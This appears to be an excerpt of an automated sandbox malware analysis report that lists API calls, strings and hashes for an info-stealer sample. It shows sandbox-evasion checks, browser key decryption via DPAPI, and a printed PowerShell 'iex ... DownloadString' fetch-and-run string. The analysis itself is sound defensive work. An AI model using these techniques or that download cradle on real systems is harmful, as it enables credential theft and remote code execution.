                                                                                    • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                                                    APIs
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02D29B08
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02D29B21
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02D29B39
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02D29B51
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02D29B6A
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02D29B82
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02D29B9A
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02D29BB3
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02D29BCB
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02D29BE3
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02D29BFC
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02D29C14
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02D29C2C
                                                                                      • Part of subcall function 02D29AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02D29C45
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D11437: ExitProcess.KERNEL32 ref: 02D11478
                                                                                      • Part of subcall function 02D113C7: GetSystemInfo.KERNEL32(?), ref: 02D113D1
                                                                                      • Part of subcall function 02D113C7: ExitProcess.KERNEL32 ref: 02D113E5
                                                                                      • Part of subcall function 02D11377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02D11392
                                                                                      • Part of subcall function 02D11377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02D11399
                                                                                      • Part of subcall function 02D11377: ExitProcess.KERNEL32 ref: 02D113AA
                                                                                      • Part of subcall function 02D11487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02D114A5
                                                                                      • Part of subcall function 02D11487: __aulldiv.LIBCMT ref: 02D114BF
                                                                                      • Part of subcall function 02D11487: __aulldiv.LIBCMT ref: 02D114CD
                                                                                      • Part of subcall function 02D11487: ExitProcess.KERNEL32 ref: 02D114FB
                                                                                      • Part of subcall function 02D269D7: GetUserDefaultLangID.KERNEL32 ref: 02D269DB
                                                                                      • Part of subcall function 02D113F7: ExitProcess.KERNEL32 ref: 02D1142D
                                                                                      • Part of subcall function 02D27AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02D1141E), ref: 02D27AE7
                                                                                      • Part of subcall function 02D27AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02D27AEE
                                                                                      • Part of subcall function 02D27AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02D27B06
                                                                                      • Part of subcall function 02D27B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D27B77
                                                                                      • Part of subcall function 02D27B47: RtlAllocateHeap.NTDLL(00000000), ref: 02D27B7E
                                                                                      • Part of subcall function 02D27B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02D27B96
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D31
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D26D4F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D26D60
                                                                                    • Sleep.KERNEL32(00001770), ref: 02D26D6B
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D81
                                                                                    • ExitProcess.KERNEL32 ref: 02D26D89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2525456742-0
                                                                                    • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                    • Instruction ID: dd3d1a1904c65a4a50e32f8e0ac24bafcb932753d21c29096026174abc46b2ab
                                                                                    • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                                                    • Instruction Fuzzy Hash: A3311875A40228ABDB04FBE0EC55BED737AEF64708F501529A102A6690EF749E08CE71
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                    • ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                    • LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 2311089104-0
                                                                                    • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                    • Instruction ID: 85a160cbbe458eb841b59fbd1574dde4fa6201c55efedc64324a95eb424359c1
                                                                                    • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                                                    • Instruction Fuzzy Hash: 673105B8A00209EFDB14CF94D8A4BEE77F6EB48304F108158E911A7390C774AA41CFA1
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 2311089104-0
                                                                                    • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                    • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                                                    • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                                                    • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 02D2CC51
                                                                                      • Part of subcall function 02D2C206: __getptd_noexit.LIBCMT ref: 02D2C209
                                                                                      • Part of subcall function 02D2C206: __amsg_exit.LIBCMT ref: 02D2C216
                                                                                    • __amsg_exit.LIBCMT ref: 02D2CC71
                                                                                    • __lock.LIBCMT ref: 02D2CC81
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02D2CC9E
                                                                                    • free.MSVCRT ref: 02D2CCB1
                                                                                    • InterlockedIncrement.KERNEL32(0042B980), ref: 02D2CCC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                    • String ID:
                                                                                    • API String ID: 634100517-0
                                                                                    • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                    • Instruction ID: 34f3e2ae5f141fa5ceb73dc80842e98c018023cdd56c2bda10b94e2a7e68dcb8
                                                                                    • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                                                    • Instruction Fuzzy Hash: 71010031A10B34ABCB20AB64944475C7360FF3071CF028127DC10673A0CB646C89EFE9
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0041C9EA
                                                                                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                                                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                                                    • __amsg_exit.LIBCMT ref: 0041CA0A
                                                                                    • __lock.LIBCMT ref: 0041CA1A
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                                                    • free.MSVCRT ref: 0041CA4A
                                                                                    • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                    • String ID:
                                                                                    • API String ID: 634100517-0
                                                                                    • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                    • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                                                    • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                    • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                                                    APIs
                                                                                    • strlen.MSVCRT ref: 02D27186
                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02D27401,00000000,00420BA8,00000000,00000000), ref: 02D271B4
                                                                                      • Part of subcall function 02D26E37: strlen.MSVCRT ref: 02D26E48
                                                                                      • Part of subcall function 02D26E37: strlen.MSVCRT ref: 02D26E6C
                                                                                    • VirtualQueryEx.KERNEL32(02D27574,00000000,?,0000001C), ref: 02D271F9
                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D27401), ref: 02D2731A
                                                                                      • Part of subcall function 02D27047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 02D2705F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                    • String ID: @
                                                                                    • API String ID: 2950663791-2766056989
                                                                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                    • Instruction ID: fd40c59311cc5ca9b5d48c97b578beb1ab987477724f52480a490aa458448da4
                                                                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                    • Instruction Fuzzy Hash: CD51F3B1A00119ABEB14CF98D981AEFB7B6FF98304F108519F915A7340D734EE15CBA5
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: *n@$*n@
                                                                                    • API String ID: 1029625771-193229609
                                                                                    • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                    • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                                                    • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                    • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                                                    APIs
                                                                                    • lstrcat.KERNEL32(?,0064A30C), ref: 02D24A42
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D24A68
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24A87
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24A9B
                                                                                    • lstrcat.KERNEL32(?,0064A284), ref: 02D24AAE
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24AC2
                                                                                    • lstrcat.KERNEL32(?,0064A2C8), ref: 02D24AD6
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D28FF7: GetFileAttributesA.KERNEL32(00000000,?,02D11DBB,?,?,0042565C,?,?,00420E1F), ref: 02D29006
                                                                                      • Part of subcall function 02D247D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02D247E7
                                                                                      • Part of subcall function 02D247D7: RtlAllocateHeap.NTDLL(00000000), ref: 02D247EE
                                                                                      • Part of subcall function 02D247D7: wsprintfA.USER32 ref: 02D2480D
                                                                                      • Part of subcall function 02D247D7: FindFirstFileA.KERNEL32(?,?), ref: 02D24824
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2540262943-0
                                                                                    • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                    • Instruction ID: 5337104457dfc60701aa1ade774a0fc46577361cf2605e2f602c742830e48c34
                                                                                    • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                    • Instruction Fuzzy Hash: BE3195B6940218ABCB10FBF0DC84EE9737AEB68704F4045C9B64596180DE749B8DCFB5
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                                                    Strings
                                                                                    • ')", xrefs: 00412CB3
                                                                                    • <, xrefs: 00412D39
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    • API String ID: 3031569214-898575020
                                                                                    • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                                                    • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02D114A5
                                                                                    • __aulldiv.LIBCMT ref: 02D114BF
                                                                                    • __aulldiv.LIBCMT ref: 02D114CD
                                                                                    • ExitProcess.KERNEL32 ref: 02D114FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 3404098578-2766056989
                                                                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction ID: 2887fee0c836d5bed552d8ea155d543ad0f3bf32cc84ebe913f97b972c4440d7
                                                                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction Fuzzy Hash: 83014BB0941308BAEF10DBD0DC89B9DBAB9AB44B09F208458E709B67C0D7B49945CB65
APIs
• memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
  • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
  • Part of subcall function 02D20CC7: memset.MSVCRT ref: 02D20E83
  • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00000000), ref: 02D20E9C
  • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02D20EAE
  • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00000000), ref: 02D20EC4
  • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00420D80), ref: 02D20ED6
  • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
• memcmp.MSVCRT(?,00421114,00000003), ref: 02D1A116
• memset.MSVCRT ref: 02D1A14F
• LocalAlloc.KERNEL32(00000040,?), ref: 02D1A1A8
Strings
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
• String ID: @
• API String ID: 1977917189-2766056989
• Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
• Instruction ID: 28276c569d9992df2555437f21ec8308340e0a4db9e63302dcccbb19df4a874a
• Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
• Instruction Fuzzy Hash: 02615A30600258EBCB18EFA4DD95FED77B2EF54304F408118E909AB690DB74AE09CF61
APIs
• strtok_s.MSVCRT ref: 00410DB8
• strtok_s.MSVCRT ref: 00410EFD
  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: strtok_s$lstrcpylstrlen
• String ID:
• API String ID: 348468850-0
• Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
• Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
• Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
• Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
• StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
  • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
  • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
  • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
  • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
• memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
  • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
  • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
  • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
  • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
Strings
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
• String ID: $"encrypted_key":"$DPAPI
• API String ID: 3731072634-738592651
• Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
• Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
• Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
• Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
APIs
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
